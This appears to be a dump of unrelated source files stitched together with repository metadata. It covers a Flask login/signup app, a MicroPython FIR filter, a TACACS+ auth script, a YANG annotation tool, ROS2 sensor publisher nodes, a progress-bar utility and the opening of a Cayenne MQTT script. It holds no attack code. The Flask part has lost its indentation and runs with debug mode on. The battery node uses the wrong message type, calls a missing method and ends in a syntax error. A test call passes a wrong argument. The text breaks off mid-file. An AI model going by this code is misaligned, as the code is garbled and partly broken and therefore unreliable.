@app.route('/questionnair', methods=['GET', 'POST'])
@login_required
def questionnair():
if request.method == "POST":
# getting input from form for first question
score = request.json["score"]
dog_breed = Dog_breed()
dog_breed_list= dog_breed.query.all()
result = calculate_range(dog_breed_list, score)
return jsonify({"score":score,"result": result})
return render_template('questionnair.html', user=current_user, page_title="Questionnair")
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
email = request.form.get('email')
password = request.form.get('password')
user = User.query.filter_by(email=email).first()
if user:
if check_password_hash(user.password, password):
flash('Logged in successfully!', category='success')
login_user(user, remember=True)
return redirect(url_for('home'))
else:
flash('Incorrect password, try again.', category='error')
else:
flash('Email does not exist.', category='error')
return render_template('login.html', user=current_user, page_title="Login")
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('login'))
@app.route('/signup', methods=['GET', 'POST'])
def signup():
if request.method== 'POST':
email= request.form.get('email')
first_name= request.form.get('firstName')
password1= request.form.get('<PASSWORD>')
password2= request.form.get('<PASSWORD>')
user = User.query.filter_by(email=email).first()
if user:
flash('Email already exists.', category='error')
elif len(email) < 4:
flash("Email must be greater than 4 characters", category='error')
elif len(first_name) < 2:
flash("First Name must be greater than 2 characters", category='error')
elif len(password1) < 7:
flash("Password must be greater than 7 characters", category='error')
elif password1 != password2:
flash("Passwords dont match", category='error')
else:
new_user = User(email=email, first_name=first_name, password=generate_password_hash(password1, method='sha256'))
# new_user = User(email=email, first_name=first_name, password=<PASSWORD>)
db.session.add(new_user)
db.session.commit()
login_user(new_user, remember=True)
flash("Account was created", category='success')
return redirect(url_for('home'))
return render_template('signup.html', user=current_user, page_title="Sign Up")
# @app.route('/score_comp', methods=["POST"])
# def score_comp():
# # user_score = request.form.get("student_id")
# # cur = mysql.connection.cursor()
# # cur.execute("DELETE FROM students WHERE student_id = %s", (student_id,)
# # conn.commit()
# # score = request.args.get('score', 0, type=json)
# return jsonify(score)
# return string.Format("your score: " + score)
# print(score)
# return jsonify(status="success")
# # return render_template('questionnair.html', user=current_user)
login_manager = LoginManager()
login_manager.login_view = 'login'
login_manager.init_app(app)
@login_manager.user_loader
def load_user(id):
return User.query.get(int(id))
if __name__ == "__main__":
app.run(host="localhost", port=8080, debug=True)
``` |
{
"source": "jojo-/filters4micropy",
"score": 4
} |
#### File: jojo-/filters4micropy/fir.py
```python
import math, cmath
class fir:
""" Class for an FIR filter"""
def __init__(self, a):
# a - list of coefficients [a0, a1, ..., an]
self._coeff = a
# Initalise the buffer
self._buffer = [0]*len(a)
# Start the counter
self._counter = 0
# Function to update the filter
def update(self, val):
# val - The new value from the sensor
# Store the new value
self._buffer[self._counter] = val
# Calculate the output
self._y = 0
for n in range(len(self._buffer)):
self._y += self._buffer[n] * self._coeff[n]
# Rotate the coefficients
self._coeff = self.rotate(self._coeff, 1)
# Update the counter
self._counter = self._counter - 1 if self._counter > 0 else len(self._buffer) - 1
# Return the output
return self._y
""" Function to rotate an array by k """
def rotate(self, arr, k):
return arr[k:]+arr[:k]
""" Function to get the current filter value """
def get(self):
return self._y
# Example implementation of the filters
if __name__ == '__main__':
import matplotlib.pyplot as plt
import numpy as np
import random
# Function to give a random noise variable
def noise(mag):
return mag * random.gauss(1, 1)
# Define the parameters for the fir filter
""" These must be determined beforehand to obtain the output you want """
a = [0.00037901217544093594,
0.003983243842986631,
0.010120005263499371,
0.010266967368121263,
-0.007027153056169479,
-0.03675557784754312,
-0.04509269415314178,
0.009995897563795745,
0.1325937532814218,
0.26476816876515974,
0.32220407747180513,
0.26476816876515974,
0.1325937532814218,
0.009995897563795745,
-0.04509269415314178,
-0.03675557784754312,
-0.007027153056169479,
0.010266967368121263,
0.010120005263499371,
0.003983243842986631,
0.00037901217544093594]
# Initialise the filter
filter = fir(a)
# Create the dummy dataset
N = 1024 # Number of samples
Fs = 500 # Sample rate (samples/sec)
Ts = 1 / Fs # Sample period (sec)
# Time variable
t = np.linspace(0.0, N*Ts, N)
# Example output - two sinusoids
x = list(np.sin(5.0 * 2.0*np.pi*t) + 0.5*np.sin(2.0 * 2.0*np.pi*t))
# Add some Gaussian noise
y = [output + noise(0.1) for output in x]
# Start an empty list
filtered = []
# Cycle through the output and filter
for y_val in y:
# Update the filter
filter.update(y_val)
# Get and store the new filtered value
filtered_val = filter.get()
filtered.append(filtered_val)
# Plot the results
plt.figure(1)
plt.plot(t, y) # Noisy signal
plt.plot(t, filtered) # Filtered signal
plt.show()
``` |
{
"source": "jojohans/ConfD-App-Notes",
"score": 2
} |
#### File: tacacs_authentication/src/auth.py
```python
from tacacs_plus.client import TACACSClient
import socket
import sys
line = sys.stdin.readline()
line = line.replace("[", "")
line = line.replace("]", "")
token = line.split(";") # token[0] username, token[1] password
def get_av_pair(arguments, key, default=None):
ret = default
for av in arguments:
avf = av.split("=")
if avf[0] == key:
ret = avf[1]
break
return ret
cli = TACACSClient('localhost', 49, 'testing123', timeout=10,
family=socket.AF_INET)
authen = cli.authenticate(token[0], token[1])
if authen.valid == True:
auth = cli.authorize(token[0], arguments=["service=tailf"])
groups = get_av_pair(auth.arguments, key="groups")
if groups != None:
uid = get_av_pair(auth.arguments, key="uid", default=9000)
gid = get_av_pair(auth.arguments, key="gid", default=100)
home = "/var/confd/homes/{}".format(token[0])
print("accept {} {} {} {}".format(groups, uid, gid, home))
else:
print(
"reject Cannot retrieve groups AV pair (tailf service) for user {}"
.format(token[0]))
else:
print("reject")
``` |
{
"source": "jojohans/ConfD-Demos",
"score": 2
} |
#### File: ann-stmt/app/tailf_ann_stmt.py
```python
import argparse
import os
import subprocess
from bs4 import BeautifulSoup
import re
from datetime import datetime
import copy
def gen_ann_module(name, ns, prefix):
revdate = datetime.today().strftime('%Y-%m-%d')
str = """<?xml version="1.0" encoding="utf-8"?>
<module>
<namespace uri="{}-ann"/>
<prefix value="{}-ann"/>
<import module="tailf-common">
<prefix value="tailf"/>
</import>
<revision date="{}">
<description>
<text>Initial revision</text>
</description>
</revision>
<tailf_prefix_annotate_module module_name="{}"/>
</module>""".format(ns,prefix,revdate,name)
return str
def add_stmt(node, ann_node, ann_soup):
if node.parent.name == "module" or node.parent.name == "submodule":
return ann_node
elif node.parent.name == "augment":
parent_ann_node = ann_soup.new_tag("tailf:annotate-statement", statement_path="{}[name=\'{}\']".format(node.parent.name, node.parent['target_node']))
else:
parent_ann_node = ann_soup.new_tag("tailf:annotate-statement", statement_path="{}[{}=\'{}\']".format(node.parent.name,
next(iter(node.parent.attrs)),
next(iter(node.parent.attrs.values()))))
parent_ann_node.append(ann_node)
return add_stmt(node.parent, parent_ann_node, ann_soup)
def tailf_ann_stmt(yang_file):
confd_dir = os.environ['CONFD_DIR']
yang_file_path = yang_file.rsplit('/', 1)
yang_path = yang_file_path[0]
yang_filename = yang_file_path[1]
ann_filename = "{}-ann.yang".format(yang_filename.rsplit('.', 1)[0])
result = subprocess.run(['python3', '/usr/local/bin/pyang', '-f', 'yin',
'-p', yang_path, '-p', confd_dir, yang_file],
stdout=subprocess.PIPE, encoding='utf-8')
yin_content = result.stdout
yin_content = yin_content.replace('tailf:', 'tailf_prefix_')
yin_content = yin_content.replace('name=', 'yname=')
yin_content = yin_content.replace('target-node=', 'target_node=')
yin_content = yin_content.replace('xmlns:', 'xmlns_')
yin_soup = BeautifulSoup(yin_content, "xml")
if yin_soup.module is not None:
annotate_module = gen_ann_module(yang_filename.rsplit('.', 1)[0],
yin_soup.module.find('namespace')['uri'],
yin_soup.module.find('prefix')['value'])
elif yin_soup.submodule is not None:
prefix = yin_soup.submodule.find('prefix')['value']
annotate_module = gen_ann_module(yang_filename.rsplit('.', 1)[0],
yin_soup.submodule["xmlns_{}".format(prefix)],
prefix)
else:
print("Error: Unknown module type. Neither a YANG module or submodule ")
return
ann_soup = BeautifulSoup(annotate_module, "xml")
for tailf_extension in yin_soup.find_all(re.compile('tailf_prefix_')):
if tailf_extension.parent is not None and tailf_extension.parent.name.startswith('tailf_prefix_') == False:
annotate_statements = add_stmt(tailf_extension, copy.copy(tailf_extension), ann_soup)
ann_soup.module.tailf_prefix_annotate_module.append(annotate_statements)
tailf_extension.decompose()
tailf_import = yin_soup.find('import', module='tailf-common')
if tailf_import is None:
create_ann_module = False
else:
create_ann_module = True
tailf_import.decompose()
tailf_ann_import = ann_soup.find('import', module='tailf-common')
if yin_soup.module is not None:
ann_soup.module.attrs = copy.copy(yin_soup.module.attrs)
for module_import in yin_soup.module.find_all('import', recursive=False):
tailf_ann_import.insert_before(copy.copy(module_import))
else:
ann_soup.module.attrs = copy.copy(yin_soup.submodule.attrs)
for module_import in yin_soup.submodule.find_all('import', recursive=False):
tailf_ann_import.insert_before(copy.copy(module_import))
ann_soup.module['yname'] = "{}-ann".format(ann_soup.module['yname'])
yin_soup_str = str(yin_soup)
yin_soup_str = yin_soup_str.replace('tailf_prefix_', 'tailf:')
yin_soup_str = yin_soup_str.replace('yname=', 'name=')
yin_soup_str = yin_soup_str.replace('target_node=', 'target-node=')
yin_soup_str = yin_soup_str.replace('xmlns_', 'xmlns:')
result = subprocess.run(['python3', '/usr/local/bin/pyang', '-f',
'yang', '-p', yang_path, '-p', confd_dir],
stdout=subprocess.PIPE, input=yin_soup_str,
encoding='utf-8')
yang_content = result.stdout
with open("yang/{}".format(yang_filename), "w") as fp:
fp.write(str(yang_content))
fp.close()
if create_ann_module is True:
ann_soup_str = str(ann_soup)
ann_soup_str = ann_soup_str.replace('tailf_prefix_', 'tailf:')
ann_soup_str = ann_soup_str.replace('annotate_module', 'annotate-module')
ann_soup_str = ann_soup_str.replace('module_name=', 'module-name=')
ann_soup_str = ann_soup_str.replace('statement_path=', 'statement-path=')
ann_soup_str = ann_soup_str.replace('yname=', 'name=')
ann_soup_str = ann_soup_str.replace('target_node=', 'target-node=')
ann_soup_str = ann_soup_str.replace('xmlns_', 'xmlns:')
result = subprocess.run(['python3', '/usr/local/bin/pyang', '-f',
'yang', '--ignore-error=UNUSED_IMPORT', '-p',
yang_path, '-p', confd_dir], stdout=subprocess.PIPE,
input=ann_soup_str, encoding='utf-8')
ann_content = result.stdout
with open("yang/{}".format(ann_filename), "w") as fp:
fp.write(str(ann_content))
fp.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument('filename', nargs=1, type=str,
help='<file> YANG module to be sanitized')
args = parser.parse_args()
tailf_ann_stmt(args.filename[0])
``` |
{
"source": "JoJoHTM/Sensors_drivers_BROV2",
"score": 3
} |
#### File: sensor_barometer/sensor_barometer/barometer_data_publisher_node.py
```python
from rclpy.node import Node
# ms5837 needed in order to utilize the BlueRobotics MS5837 Python Library which must be installed
from sensor_barometer import ms5837
from sensor_interfaces.msg import Barometer
import time
import re, uuid
class BarometerDataPublisher(Node):
# Initializer
def __init__(self):
super().__init__('BarometerDataPublisher')
self.publisher_ = self.create_publisher(Barometer, 'barometer_data', 10) # Creates a publisher over the topic barometer_data
read_period = 2 # Does a reading every 2 seconds
self.timer = self.create_timer(read_period, self.barometer_read_and_publish)
self.sensor = ms5837.MS5837_30BA()
# self.sensor.setFluidDensity() # Configuring fluid density for fresh or saltwater. Defaulting to fresh water
if not self.sensor.init():
# If sensor can not be detected
print("Sensor could not be initialized")
exit(1)
def barometer_read_and_publish(self):
# Custom barometer message to publish. Can be found in the sensor_interfaces.
msg = Barometer()
# Adding a way to read the time
tim = time.localtime()
msg.local_time = time.strftime("%H:%M",tim)
# Getting the mac address of the system
msg.mac = ':'.join(re.findall('..','%012x' % uuid.getnode()))
# Reading barometer and loading data into custom message
if self.sensor.read():
msg.depth = self.sensor.depth() # Depth in meters using the fluid density (kg/m^3) configured by setFluidDensity()
msg.pressure_mbar = self.sensor.pressure() # Default is mbar (no arguments)
msg.pressure_psi = self.sensor.pressure(ms5837.UNITS_psi) # Request psi
else:
print("Sensor read failed!")
exit(1)
# Publishing message and logging data sent over the topic /barometer_data
self.publisher_.publish(msg)
self.get_logger().info('Mac: %s Depth: %0.2f m\tP: %0.1f mbar %0.3f psi %s' % (msg.mac,
msg.depth,
msg.pressure_mbar,
msg.pressure_psi,
msg.local_time))
```
#### File: sensor_battery/sensor_battery/battery_data_publisher_node_main.py
```python
import rclpy
from sensor_battery import battery_data_publisher_node as node
def main(args=None):
rclpy.init(args=args)
# Construct the publisher
battery_data_publisher = node.BatteryDataPublisher()
# Reading and publishing data at defined rate (2 seconds)
rclpy.spin(battery_data_publisher)
# Clean up when script is stopped
battery_data_publisher.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
```
#### File: sensor_battery/sensor_battery/battery_data_publisher_node.py
```python
from rclpy.node import Node
from sensor_battery import ads1x15
from sensor_interfaces.msg import Battery
class BatteryDataPublisher(Node):
# Initialize
def __init__(self):
super().__init__('BatteryDataPublisher')
self.publisher_ = self.create_publisher(Barometer, 'battery_data', 10) # Creates a publisher over the topic battery_data
read_period = 2 # Does a reading every 2 seconds
self.timer = self.create_timer(read_period, self.battery_read_and_publish)
self.sensor = ads1x15.ADS1x15()
def battery_read_and_publish(self):
# Custom battery message to publish. Can be found in the sensor_interfaces.
msg = Battery()
# Choose a gain of 1 for reading voltages from 0 to 4.09V.
# Or pick a different gain to change the range of voltages that are read:
# - 2/3 = +/-6.144V
# - 1 = +/-4.096V
# - 2 = +/-2.048V
# - 4 = +/-1.024V
# - 8 = +/-0.512V
# - 16 = +/-0.256V
# See table 3 in the ADS1015/ADS1115 datasheet for more info on gain.
GAIN = 1
# TODO:
# Get readings from ADS1115 and convert to proper values.(https://discuss.bluerobotics.com/t/need-help-connecting-the-power-sense-module-r2-to-a-arduino/4679)
# Compare these values to a graph of battery lifecycle to determine battery percentage.
adc_value0 = self.read_adc(0, gain=GAIN) #Reads the ADC-value on channel A0
self.publisher_.publish(msg)
self.get_logger().info(##Write in here)
```
#### File: sensor_oxygen/sensor_oxygen/oxygen_data_publisher_node_main.py
```python
import rclpy
from sensor_oxygen import oxygen_data_publisher_node as node
def main(args=None):
rclpy.init(args=args)
# Construct the publisher
oxygen_data_publisher = node.OxygenDataPublisher()
# Reading and publishing data at defined rate (0.1 seconds)
rclpy.spin(oxygen_data_publisher)
# Clean up when script is stopped
oxygen_data_publisher.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
```
#### File: sensor_salinity/sensor_salinity/salinity_data_publisher_node.py
```python
from rclpy.node import Node
# tsys01 needed in order to utilize the BlueRobotics TSYS01 Python Library which must be installed
from sensor_salinity import catlas01
from sensor_interfaces.msg import Salinity
import time
import re, uuid
class SalinityDataPublisher(Node):
# Initializer
def __init__(self):
super().__init__('SalinityDataPublisher')
self.publisher_ = self.create_publisher(Salinity, 'salinity_data', 10) # Creates a publisher over the topic salinity_data
read_period = 2 # Does a reading every 2 seconds
self.timer = self.create_timer(read_period, self.salinity_read_and_publish)
self.sensor = catlas01.CATLAS01()
# if not self.sensor.init():
# print("Sensor could not be initialized")
# exit(1)
def salinity_read_and_publish(self):
# Custom conductivity message to publish. Can be found in the brov2_interfaces.
msg = Salinity()
# Adding a way to read the time
tim = time.localtime()
msg.local_time = time.strftime("%H:%M",tim)
# Getting the mac address of the system
msg.mac = ':'.join(re.findall('..','%012x' % uuid.getnode()))
# Reading salinity and loading data into custom message
if self.sensor.read():
msg.salinity_value = self.sensor._salinity
else:
print("Sensor read failed!")
exit(1)
# Publishing message and logging data sent over the topic /salinity_data
self.publisher_.publish(msg)
self.get_logger().info('Mac: %s O: %0.2f µs/cm %s' % (msg.mac,
msg.salinity_value,
msg.local_time))
```
#### File: sensor_thermometer/sensor_thermometer/thermometer_data_publisher_node_main.py
```python
import rclpy
from sensor_thermometer import thermometer_data_publisher_node as node
def main(args=None):
rclpy.init(args=args)
# Construct the publisher
thermometer_data_publisher = node.ThermometerDataPublisher()
# Reading and publishing data at defined rate (2 seconds)
rclpy.spin(thermometer_data_publisher)
# Clean up when script is stopped
thermometer_data_publisher.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
``` |
{
"source": "jojoin/cutout",
"score": 2
} |
#### File: cutout/cutout/common.py
```python
import urllib
import urllib.request
import urllib.parse
import os.path
import sys
import re
import time
from .util import sec2time, parse_argv
#default_encoding = sys.getfilesystemencoding()
#if default_encoding.lower() == 'ascii':
# default_encoding = 'utf-8'
# the old function
##ProgressBar 进度条组件
#注释为了方便,把所有“进度条”文字改为“bar”
class ProgressBar:
def __init__(self
, piece_total=0 #总数据量
, label='' #显示在bar之前的title
, info='' #显示在bar之后的说明
):
self.displayed = False #是否已经显示bar
self.piece_total = piece_total
self.piece_current = 0
self.label = label
self.face() #外观
self.start() #数据初始化
self.filtrate = {}
#设置数据
def set(self
, piece_total=0 #bar左边的包裹符号
):
if piece_total>0:
self.piece_total = piece_total
#设置bar的ui外观
def face(self
, ui_wl='[' #bar左边的包裹符号
, ui_wr=']' #bar右边的包裹符号
, ui_fn='=' #bar已经完成的部分
, ui_lk=' ' #bar未完成的部分
, ui_hd='>' #bar已经完成的部分的头部
, ui_leg=50 #bar的长度
, ui_split=' ' #显示项目之间的分割字符
, it_time=True #是否显示进度时间
, it_piece=True #是否显示进度数量
, it_percent=True #是否显示当前百分比
, it_speed=True #是否显示速度
, it_perspeed=True #是否显示百分比速度
, sh_piece_division = 1 #piece显示的时候除法
, sh_piece_unit = '' #piece显示的单位
):
self.ui_wl = ui_wl
self.ui_wr = ui_wr
self.ui_fn = ui_fn
self.ui_lk = ui_lk
self.ui_hd = ui_hd
self.ui_leg = ui_leg
self.ui_split = ui_split
self.it_time = it_time
self.it_piece = it_piece
self.it_percent = it_percent
self.it_speed = it_speed
self.it_perspeed = it_perspeed
self.sh_piece_division = sh_piece_division
self.sh_piece_unit = sh_piece_unit
#开始bar(初始化一些数据)
def start(self):
self.piece_current = 0 #当前数据量
self.percent_current = 0 #当前百分比 0~100
self.start_time = int(time.time()) #bar启动时间
self.isDone = False
#进度条数据到达
# @type 进度的类型 percent:百分比 piece:部分数据
# @mode 如何修改进度 add:累加 set:设置
def step(self,step,type="piece",mode="add"):
if type=='percent':
if mode=='add':
self.percent_current += step
elif type=='percent':
self.percent_current = step
elif type=='piece':
if mode=='add':
self.piece_current += step
elif type=='percent':
self.piece_current = step
#算百分比
if self.piece_total > 0:
self.percent_current = self.piece_current/self.piece_total*100
#更新显示
self.update()
#判断是否已经完结
if self.percent_current >= 100:
self.done() #已经完成
#更新bar显示
def update(self):
if self.isDone:
return
self.displayed = True
percent = self.percent_current
ui_hd = self.ui_hd
if percent >= 100:
percent = 100
ui_hd = self.ui_fn
barleg = self.ui_leg - 1
num_left = int((percent/100) * barleg)
#print(percent)
num_right = barleg - num_left
barstr = (self.ui_fn*num_left
+ ui_hd
+ self.ui_lk*num_right
)
additiveTime = int(time.time()) - self.start_time
if additiveTime==0:
additiveTime = 1
#print(sec2time(additiveTime))
barstr = (self.label
+ self.ui_wl
+ barstr
+ self.ui_wr
)
#piece格式化字符串
p_n_f = '%d'
ui_sp = self.ui_split
if self.sh_piece_division>1:
p_n_f = '%.2f'
if self.it_percent:
barstr += ui_sp+'%.2f'%percent + '%'
if self.it_perspeed:
perspeed = '%.2f'%(percent/additiveTime)
barstr += ui_sp+perspeed + '%/s'
if self.it_speed:
speed = p_n_f%((self.piece_current/self.sh_piece_division)/additiveTime)
barstr += ui_sp+speed + self.sh_piece_unit + '/s'
if self.it_piece:
barstr += (ui_sp+p_n_f%(self.piece_current/self.sh_piece_division)+self.sh_piece_unit
+'/'+p_n_f%(self.piece_total/self.sh_piece_division)+self.sh_piece_unit)
if self.it_time:
barstr += ui_sp+sec2time(additiveTime,fillzero=True,fillhour=True)
#print(num_left)
#print(barstr)
sys.stdout.write('\r'+barstr)
sys.stdout.flush()
#数据处理回调
def filtrate(self,name,callback):
self.filtrate[name] = callback;
#进度bar完成,关闭
def done(self):
self.isDone = True
if self.displayed:
print()
self.displayed = False
## 命令行映射器
# 从命令行映射到函数
class CommandDirect:
def __init__(self
, type='*' #已数组形式解包参数
, main=None #main函数
):
self.maps = {}
self.type = type
self.main = main
## 执行路由
def __call__(self):
if not self.main:
self.direct()
return
#调用处理
param = sys.argv[1:]
self.callfunc(self.main,param)
## 添加映射 将命令行参数 映射到函数
def add(self,name,func):
self.maps[name] = func
## 调用处理
def callfunc(self,func,param):
if not param:
func() #无参数
return
tp = self.type
if '**'==tp:
param = parse_argv(param) #关键字参数解包
func(**param)
elif '*'==tp:
func(*param)
## 执行路由
def direct(self):
if not sys.argv:
return
argv = sys.argv[1:]
if not argv:
return
name = argv[0]
maps = self.maps
if not name in maps:
return
param = argv[1:]
#调用处理
self.callfunc(maps[name],param)
if __name__ == "__main__":
print('###进度条测试')
bar = ProgressBar(label='Bar: ',total_piece=99);
bar.face(
ui_wl='[' #bar左边的包裹符号
, ui_wr=']' #bar右边的包裹符号
, ui_fn='=' #bar已经完成的部分
, ui_lk=' ' #bar未完成的部分
, ui_hd='>' #bar已经完成的部分的头部
)
bar.step(10)
time.sleep(0.9)
bar.step(7)
time.sleep(0.8)
bar.step(11)
time.sleep(0.7)
bar.step(13)
time.sleep(0.6)
bar.step(9)
time.sleep(0.5)
bar.step(10)
time.sleep(0.4)
bar.step(10)
time.sleep(0.3)
bar.step(10)
time.sleep(0.2)
bar.step(10)
time.sleep(0.1)
bar.step(10)
'''
def to_native_string(s):
if type(s) == unicode:
return s.encode(default_encoding)
else:
return s
def r1(pattern, text):
m = re.search(pattern, text)
if m:
return m.group(1)
def r1_of(patterns, text):
for p in patterns:
x = r1(p, text)
if x:
return x
def unescape_html(html):
import xml.sax.saxutils
html = xml.sax.saxutils.unescape(html)
html = re.sub(r'&#(\d+);', lambda x: unichr(int(x.group(1))), html)
return html
def ungzip(s):
from StringIO import StringIO
import gzip
buffer = StringIO(s)
f = gzip.GzipFile(fileobj=buffer)
return f.read()
def undeflate(s):
import zlib
return zlib.decompress(s, -zlib.MAX_WBITS)
def get_response(url):
response = urllib2.urlopen(url)
data = response.read()
if response.info().get('Content-Encoding') == 'gzip':
data = ungzip(data)
elif response.info().get('Content-Encoding') == 'deflate':
data = undeflate(data)
response.data = data
return response
def get_html(url, encoding=None):
content = get_response(url).data
if encoding:
content = content.decode(encoding)
return content
def get_decoded_html(url):
response = get_response(url)
data = response.data
charset = r1(r'charset=([\w-]+)', response.headers['content-type'])
if charset:
return data.decode(charset)
else:
return data
def url_save(url, filepath, bar, refer=None):
headers = {}
if refer:
headers['Referer'] = refer
request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)
file_size = int(response.headers['content-length'])
assert file_size
if os.path.exists(filepath):
if file_size == os.path.getsize(filepath):
if bar:
bar.done()
print 'Skip %s: file already exists' % os.path.basename(filepath)
return
else:
if bar:
bar.done()
print 'Overwriting', os.path.basename(filepath), '...'
with open(filepath, 'wb') as output:
received = 0
while True:
buffer = response.read(1024*256)
if not buffer:
break
received += len(buffer)
output.write(buffer)
if bar:
bar.update_received(len(buffer))
assert received == file_size == os.path.getsize(filepath), '%s == %s == %s' % (received, file_size, os.path.getsize(filepath))
def url_size(url):
request = urllib2.Request(url)
request.get_method = lambda: 'HEAD'
response = urllib2.urlopen(request)
size = int(response.headers['content-length'])
return size
def url_size(url):
size = int(urllib2.urlopen(url).headers['content-length'])
return size
def urls_size(urls):
return sum(map(url_size, urls))
class SimpleProgressBar:
def __init__(self, total_size, total_pieces=1):
self.displayed = False
self.total_size = total_size
self.total_pieces = total_pieces
self.current_piece = 1
self.received = 0
def update(self):
self.displayed = True
bar_size = 40
percent = self.received*100.0/self.total_size
if percent > 100:
percent = 100.0
bar_rate = 100.0 / bar_size
dots = percent / bar_rate
dots = int(dots)
plus = percent / bar_rate - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
bar = '=' * dots + plus
bar = '{0:>3.0f}% [{1:<40}] {2}/{3}'.format(percent, bar, self.current_piece, self.total_pieces)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def update_received(self, n):
self.received += n
self.update()
def update_piece(self, n):
self.current_piece = n
def done(self):
if self.displayed:
print
self.displayed = False
class PiecesProgressBar:
def __init__(self, total_size, total_pieces=1):
self.displayed = False
self.total_size = total_size
self.total_pieces = total_pieces
self.current_piece = 1
self.received = 0
def update(self):
self.displayed = True
bar = '{0:>3}%[{1:<40}] {2}/{3}'.format('?', '?'*40, self.current_piece, self.total_pieces)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def update_received(self, n):
self.received += n
self.update()
def update_piece(self, n):
self.current_piece = n
def done(self):
if self.displayed:
print
self.displayed = False
class DummyProgressBar:
def __init__(self, *args):
pass
def update_received(self, n):
pass
def update_piece(self, n):
pass
def done(self):
pass
def escape_file_path(path):
path = path.replace('/', '-')
path = path.replace('\\', '-')
path = path.replace('*', '-')
path = path.replace('?', '-')
return path
def download_urls(urls, title, ext, total_size, output_dir='.', refer=None, merge=True):
assert urls
assert ext in ('flv', 'mp4')
if not total_size:
try:
total_size = urls_size(urls)
except:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
pass
title = to_native_string(title)
title = escape_file_path(title)
filename = '%s.%s' % (title, ext)
filepath = os.path.join(output_dir, filename)
if total_size:
if os.path.exists(filepath) and os.path.getsize(filepath) >= total_size * 0.9:
print 'Skip %s: file already exists' % filepath
return
bar = SimpleProgressBar(total_size, len(urls))
else:
bar = PiecesProgressBar(total_size, len(urls))
if len(urls) == 1:
url = urls[0]
print 'Downloading %s ...' % filename
url_save(url, filepath, bar, refer=refer)
bar.done()
else:
flvs = []
print 'Downloading %s.%s ...' % (title, ext)
for i, url in enumerate(urls):
filename = '%s[%02d].%s' % (title, i, ext)
filepath = os.path.join(output_dir, filename)
flvs.append(filepath)
#print 'Downloading %s [%s/%s]...' % (filename, i+1, len(urls))
bar.update_piece(i+1)
url_save(url, filepath, bar, refer=refer)
bar.done()
if not merge:
return
if ext == 'flv':
from flv_join import concat_flvs
concat_flvs(flvs, os.path.join(output_dir, title+'.flv'))
for flv in flvs:
os.remove(flv)
elif ext == 'mp4':
from mp4_join import concat_mp4s
concat_mp4s(flvs, os.path.join(output_dir, title+'.mp4'))
for flv in flvs:
os.remove(flv)
else:
print "Can't join %s files" % ext
def playlist_not_supported(name):
def f(*args, **kwargs):
raise NotImplementedError('Play list is not supported for '+name)
return f
def script_main(script_name, download, download_playlist=None):
if download_playlist:
help = 'python %s.py [--playlist] [-c|--create-dir] [--no-merge] url ...' % script_name
short_opts = 'hc'
opts = ['help', 'playlist', 'create-dir', 'no-merge']
else:
help = 'python [--no-merge] %s.py url ...' % script_name
short_opts = 'h'
opts = ['help', 'no-merge']
import sys, getopt
try:
opts, args = getopt.getopt(sys.argv[1:], short_opts, opts)
except getopt.GetoptError, err:
print help
sys.exit(1)
playlist = False
create_dir = False
merge = True
for o, a in opts:
if o in ('-h', '--help'):
print help
sys.exit()
elif o in ('--playlist',):
playlist = True
elif o in ('-c', '--create-dir'):
create_dir = True
elif o in ('--no-merge'):
merge = False
else:
print help
sys.exit(1)
if not args:
print help
sys.exit(1)
for url in args:
if playlist:
download_playlist(url, create_dir=create_dir, merge=merge)
else:
download(url, merge=merge)
'''
```
#### File: cutout/cutout/util.py
```python
import sys,re
import urllib.parse as urlparse
## 补全不足
# @side 填充位置 left
def fillside(stuff,width=None,fill=' ',side='left'):
if not width or not isinstance(width,int):
return stuff
stuff = str(stuff)
w = len(stuff)
if w > width:
return num
fillstr = fill * (width-w)
if side=='left':
return fillstr+stuff
elif side=='right':
return stuff+fillstr
else:
return stuff
## 限定数值范围
def rangable(num,low=None,top=None):
if low and num<low:
return low
elif top and num>top:
return top
else:
return num
## 解析命令行参数
# @kr 去掉key里的 “-” 符号
def parse_argv(argv, kr='-'):
#argv = argv[1:] # 去除文件名
leg = len(argv)
num = -1
redict = {}
#redict = dict( (k,v) for k in arg )
while True: # 循环获取参数
num += 1
if num>=leg: break
if num%2: continue
k = argv[num].replace(kr,'')
v = argv[num+1] if num+1<leg else ''
redict[k] = v
return redict
## 将计时器"时:分:秒"字符串转换为秒数间隔
def time2sec(sTime):
leg = len(sTime)
if leg<=5: #小时位补齐
sTime = '0:'+sTime
p="^([0-9]+):([0-5][0-9]):([0-5][0-9])$"
cp=re.compile(p)
try:
mTime=cp.match(sTime)
except TypeError:
return "[InModuleError]:time2sec(sTime) invalid argument type"
if mTime:
t = list(map(int,mTime.group(1,2,3)))
return 3600*t[0]+60*t[1]+t[2]
else:
return "[InModuleError]:time2sec(sTime) invalid argument value"
## 将秒数间隔转换为计时器"时:分:秒"字符串
# @fillzero 是否补全0位
# @fillhour 是否补全小时位
def sec2time(iItv,fillzero=True,fillhour=False):
if type(iItv)==type(1):
h=int(iItv/3600)
sUp_h=iItv-3600*h
m=int(sUp_h/60)
sUp_m=sUp_h-60*m
s=int(sUp_m)
time = (m,s)
if h>0 or fillhour: time = (h,m,s)
def fill_zero(num):
if num<10:
return '0'+str(num)
return str(num)
if not fillzero: fill_zero = str
return ":".join(map(fill_zero,time))
else:
return "[InModuleError]:sec2time(iItv) invalid argument type"
## url编码
def urlencode(stuff) :
if isinstance(stuff, dict):
return urlparse.urlencode(stuff)
elif isinstance(stuff, str):
return urlparse.quote(stuff)
## url解码
def urldecode(str) :
return urlparse.unquote(str)
``` |
{
"source": "jojo-/industry-4.0",
"score": 3
} |
#### File: industry-4.0/robot/server.py
```python
import asyncio
import struct
import math
import textwrap
import cayenne.client
import time
import threading
# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.
MQTT_USERNAME = "XXX"
MQTT_PASSWORD = "<PASSWORD>"
MQTT_CLIENT_ID = "ZZZ"
# Connecting to Cayenne
print("Connecting to Cayenne...")
client = cayenne.client.CayenneMQTTClient()
